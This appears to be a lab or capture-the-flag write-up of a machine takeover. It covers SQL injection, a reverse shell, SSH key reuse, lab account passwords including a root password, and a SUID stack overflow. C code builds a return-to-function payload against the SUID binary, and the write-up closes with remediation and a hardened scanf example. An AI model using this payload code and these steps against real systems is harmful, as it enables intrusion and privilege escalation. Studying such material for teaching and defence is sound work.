We ran automated SQL injection attacks against this form and obtained a set of credentials.
With them we are able to run commands on the host, which we use to obtain a reverse shell.
Exploitation
We found a hidden file on the machine, and its content is pinguapingu.
Lateral movement
There are two users, papa and pingu. We can export pingu's SSH private key, which lets us keep persistent access to the pingu account without relying on the web shell.
The private key is protected with a passphrase. The password we found in /var/hidden/pass works as the passphrase.
Privilege escalation
A suspicious binary has the SUID bit set, so it runs with its owner's privileges whoever executes it. We copy it off the machine for further analysis.
The file is an executable. Loading it in Ghidra lets us decompile it and follow its control flow.
The main function reads user input with scanf into a fixed-size stack buffer with no length limit, so a sufficiently long input overwrites the saved return address: a classic stack buffer overflow. We also find a function called shell, which opens a file that could contain sensitive information, so the goal is to redirect execution into shell.
We used pwndbg to:
Determine the input length needed to cause a segmentation fault, i.e. the offset from the start of the buffer to the saved return address.
Find the address of the shell function.
Run the script below.
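The two debugger steps and the resulting payload, as an added worked example in C (this is not the writeup's script). The pattern is Metasploit-style rather than pwndbg's De Bruijn `cyclic`, but it is used the same way: send it, read the bytes that landed at RSP when `ret` faulted, and look them up. The offset 72 and the address 0x401196 are placeholders for illustration, not values from the target; the real ones come from pwndbg and from Ghidra.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Added example, not the writeup's code. Step 1: a cyclic pattern whose every
 * 4-byte window is unique, so the bytes that end up in the saved return
 * address identify their own offset. Step 2: the ret2func payload, padding up
 * to that offset followed by the address of shell(), little-endian on x86-64.
 */

#define MAX_PAYLOAD 512
static uint8_t payload[MAX_PAYLOAD];

/* Fill out[0..len) with Aa0Aa1Aa2...; out must have room for len+1 bytes. */
size_t pattern_create(char *out, size_t len) {
    const char *upper = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    const char *lower = "abcdefghijklmnopqrstuvwxyz";
    const char *digit = "0123456789";
    size_t n = 0;
    for (int a = 0; a < 26 && n < len; a++)
        for (int b = 0; b < 26 && n < len; b++)
            for (int c = 0; c < 10 && n < len; c++) {
                const char trip[3] = { upper[a], lower[b], digit[c] };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = trip[i];
            }
    out[n] = '\0';
    return n;
}

/* crash_value is the 8 bytes the debugger shows at RSP after the overflow
 * (the address is non-canonical, so the fault happens on `ret` itself).
 * Only the low 4 bytes are needed. Returns their offset in a pattern of
 * pattern_len bytes, or -1 if they do not occur in it. */
long pattern_offset(uint64_t crash_value, size_t pattern_len) {
    char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (char)((crash_value >> (8 * i)) & 0xff);  /* little-endian */

    char *pat = malloc(pattern_len + 1);
    if (pat == NULL) return -1;
    size_t n = pattern_create(pat, pattern_len);
    long found = -1;
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0) { found = (long)i; break; }
    free(pat);
    return found;
}

/* Build "A" * offset + p64(target) into payload[]. Returns its length, or 0 if
 * the target address contains a byte scanf("%s") treats as whitespace: scanf
 * would stop reading there and the address would be truncated. */
size_t build_ret2func(size_t offset, uint64_t target) {
    if (offset + 8 > MAX_PAYLOAD) return 0;
    for (int i = 0; i < 8; i++) {
        uint8_t b = (uint8_t)(target >> (8 * i));
        if (b == ' ' || (b >= '\t' && b <= '\r')) return 0;  /* isspace() set */
        payload[offset + i] = b;
    }
    memset(payload, 'A', offset);
    return offset + 8;
}

/* Accessor so the payload can be inspected byte by byte. */
uint8_t payload_byte(size_t i) {
    return payload[i];
}

int main(int argc, char **argv) {
    /* Usage: ./mkpayload <offset> <hex address of shell> | ./suid_binary
     * The defaults below are placeholders, not values from the target. */
    size_t offset = argc > 1 ? strtoul(argv[1], NULL, 0) : 72;
    uint64_t target = argc > 2 ? strtoull(argv[2], NULL, 16) : 0x401196ULL;
    size_t len = build_ret2func(offset, target);
    if (len == 0) {
        fprintf(stderr, "bad offset or address contains whitespace\n");
        return 1;
    }
    fwrite(payload, 1, len, stdout);
    putchar('\n');  /* terminates scanf("%s"); the newline is not part of the overflow */
    return 0;
}
```

Two caveats when using this against a real SUID binary: the fixed address of shell only works if the binary is not PIE (otherwise the base must be leaked first), and on x86-64, if shell() crashes inside a libc call right after the jump, the stack is misaligned by 8 bytes; inserting the address of a lone `ret` instruction before the address of shell fixes that.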
Credentials:
papa:postman
root:lov2fish
Remediation
Use strong, unique passwords, and do not leave them in plaintext files on the host such as /var/hidden/pass.
Use parameterised queries so the login form cannot be abused for SQL injection, and do not expose dangerous functionality such as web shells or command execution to the network.
Do not read input with scanf("%s") or other unbounded calls; use a width limit tied to the buffer size (for example "%63s" for a 64-byte buffer) or fgets with the buffer size.
Compile C programs with exploit mitigations (stack canaries, NX, PIE with ASLR, FORTIFY_SOURCE), and remove the SUID bit from binaries that do not need it.
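The scanf defect the writeup describes next to its fixed form, as an added example in C (constructed here, not code from the target binary). A sentinel placed right after the buffer stands in for the saved return address so the overwrite can be observed in-process; the 64-byte buffer size and the sentinel value are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example, not the target's code. The width in the fixed reader is
 * derived from the buffer size with the preprocessor, so the two cannot
 * drift apart when the buffer is later resized.
 */

#define NAME_MAX 63            /* characters stored, excluding the terminator */
#define STR_(x) #x
#define STR(x) STR_(x)
#define SENTINEL 0x1122334455667788ULL

struct frame {
    char name[NAME_MAX + 1];   /* 64-byte buffer, an assumed size */
    uint64_t saved_ret;        /* sentinel standing in for the saved return address */
};

/* Vulnerable: "%s" has no width, so the copy continues until whitespace no
 * matter how large name is. Kept only for comparison; never use on untrusted input. */
void read_name_vulnerable(struct frame *f, const char *input) {
    sscanf(input, "%s", f->name);
}

/* Fixed: "%63s" stores at most NAME_MAX characters, so the terminator always
 * fits. Returns the number of characters stored (0 if nothing matched). */
size_t read_name_fixed(struct frame *f, const char *input) {
    f->name[0] = '\0';
    if (sscanf(input, "%" STR(NAME_MAX) "s", f->name) != 1)
        return 0;
    return strlen(f->name);
}

/* Run the fixed reader and report the stored length. */
size_t fixed_len(const char *input) {
    struct frame f;
    return read_name_fixed(&f, input);
}

/* Run the fixed reader and report whether the sentinel next to the buffer survived. */
int fixed_keeps_sentinel(const char *input) {
    struct frame f;
    f.saved_ret = SENTINEL;
    read_name_fixed(&f, input);
    return f.saved_ret == SENTINEL;
}

/* Constructed input: 120 'A's, far longer than the buffer. */
const char *long_input(void) {
    static char buf[121];
    memset(buf, 'A', 120);
    buf[120] = '\0';
    return buf;
}

int main(void) {
    struct frame f;

    /* 70 'A's: enough to run six bytes into the sentinel without leaving the struct. */
    char over[71];
    memset(over, 'A', 70);
    over[70] = '\0';
    f.saved_ret = SENTINEL;
    read_name_vulnerable(&f, over);
    printf("vulnerable: saved_ret = 0x%016llx (was 0x%016llx)\n",
           (unsigned long long)f.saved_ret, (unsigned long long)SENTINEL);

    f.saved_ret = SENTINEL;
    size_t n = read_name_fixed(&f, long_input());
    printf("fixed: stored %zu chars, saved_ret = 0x%016llx\n",
           n, (unsigned long long)f.saved_ret);
    return 0;
}
```

Building with `gcc -O2 -fstack-protector-strong -D_FORTIFY_SOURCE=2 -fPIE -pie -Wl,-z,relro,-z,now` adds the second layer: a canary turns the overwrite of a real return address into an abort instead of a jump into shell, and PIE with ASLR means the address of shell is no longer fixed.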